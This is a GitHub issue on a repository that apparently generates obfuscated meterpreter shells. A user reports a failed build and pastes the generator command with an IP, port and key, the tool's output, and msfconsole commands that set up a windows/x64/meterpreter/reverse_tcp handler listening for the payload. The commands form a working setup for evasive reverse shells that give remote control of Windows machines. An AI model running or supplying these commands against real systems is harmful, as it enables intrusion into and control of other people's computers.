smokeme / payloadGenerator

Generate obfuscated meterpreter shells
MIT License
225 stars 26 forks source link

build failed #4

Open sec13b opened 2 months ago

sec13b commented 2 months ago

The build failed. Fix the build errors and run again.

sudo python3 generate.py -ip 10.168.10.128 -port 11011 -key vICWUPWkPFVsRGfWoevyhlTUGCPGkeNY
python3 generate.py -ip 10.168.10.128 -port 11011 -key vICWUPWkPFVsRGfWoevyhlTUGCPGkeNY

Same error for both

> Generator goes brrrr
> Generating encoded shellcode
> Generating payload

The build failed. Fix the build errors and run again.
> Cleanup
cp: cannot stat '/home/kali/Desktop/payloadGenerator/Payload/bin/Release/net45/win10-x64/Payload.exe': No such file or directory
> Open msfconsole and run the following:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.168.10.128
set LPORT 11011
set EXITFUNC thread
run -j

You should see payload.exe now
┌──(kali㉿kali)-[~/Desktop/payloadGenerator]
└─$ dotnet --version
6.0.425

┌──(kali㉿kali)-[~/Desktop/payloadGenerator]
└─$
sec13b commented 2 months ago

windows

image